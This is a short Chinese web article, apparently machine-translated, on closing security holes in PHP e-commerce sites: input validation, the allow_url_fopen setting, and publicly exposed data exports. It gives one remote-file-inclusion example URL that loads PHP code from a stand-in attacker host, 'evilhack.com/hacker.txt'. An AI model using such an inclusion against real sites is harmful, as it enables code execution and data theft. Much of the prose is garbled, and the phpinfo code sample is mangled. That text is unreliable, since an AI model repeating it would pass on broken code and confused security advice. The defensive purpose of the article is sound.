电子商务安全-堵塞安全漏洞

在一个电子商务网站需要有一个重要的考虑因素时，开发一个安全电子商务网站或软件。开发人员必须对所有的安全网站设计时注意事项。随着电子商务的日益普及，这些天，安全攻击数量肯定增加。偏执狂是一个电子健康的事情，电子商务网站开发人员，我们必须保持与安全问题的大门，并保持我们的耳朵和眼睛打开。虽然以下漏洞严重的，如果存在以下漏洞很容易修复。

下面列出了一些安全方面的考虑应包括在开发一个网站。本文不包括电子买，请参阅我在这个单独的条文。

用户输入-每个输入，无论是进入了数量，产品搜索，输入一个名称等，必须对可疑人物进行验证。如果不这样做，它有可能进入"?>",结束的PHP结束标记和执行一些PHP代码。

这是更加安全，让数字和字符宰（包括资金）和0-9，没有别的，而不是使所有的字符不应该存在的清单。验证脚本需要通过每一个字，一个字一个滚动。这需要实现服务器端验证使用，与JavaScript。使用服务器端的输入验证是必需的不需要的字符

另一个主要存在在执行PHP代码。当使用PHP有一个叫做allow_url_fopen选项设置使从PHP脚本文件的开放。此设置应关闭，除非绝对必要的。

试想你有固定的页眉和页脚PHP脚本，并访问您的网页你会在http://www.mysite.com/index.php?page=page2类型。它采取的所有是一个恶意用户通过修改运行中输入“这些参数的脚本http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt”与一些文件中的PHP代码“hacker.txt”。你可以有任何事情发生，PHP文件阅读，删除，重要信息被盗。

如果您不知道此设置或关闭，请复制到一个文本文件下面的PHP代码，并将其上传到您的Web服务器：

phpinfo（）函数;
？“

当您访问您的网络服务器上的脚本，你应该遇到设立allow_url_fopen选项下的配置。

计算机用户，一般情况下无法找到该设置值。

要小心的出口数据如订单，产品在CSV和MySQL文件。如果这些数据是从脚本导出并在Web服务器上保存在一个共同文件的名称，即。 http://www.mysite.com/admin/output_tables.csv。这仅仅是一个真正的问题时，导出的数据，在文件所在的目录是公开访问的。有两种方法来防止这种安全漏洞-首先有密码保护的背后输出文件的目录，其次有内部的HTML textarea的剧本上的表单元素里的数据。该店主可以复制此信息的文本文件，并创建一个在他们的计算机和信息粘贴在这里新的文件。

只需要一黑客通过检查发现了电子商务软件的演示网站，并寻找一个真正的网站使用的文件名相同的文件名。

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video 了解关于安全计算	播放视频 如何让您的电脑安全	播放视频 如何检查Windows Vista中的安全设置

下面列出的是更多的是从“电子商务”类物品上述文章中的文章。

在上述文章中有关“电子商务安全-堵塞安全漏洞，”人们也有兴趣在下列有关条款：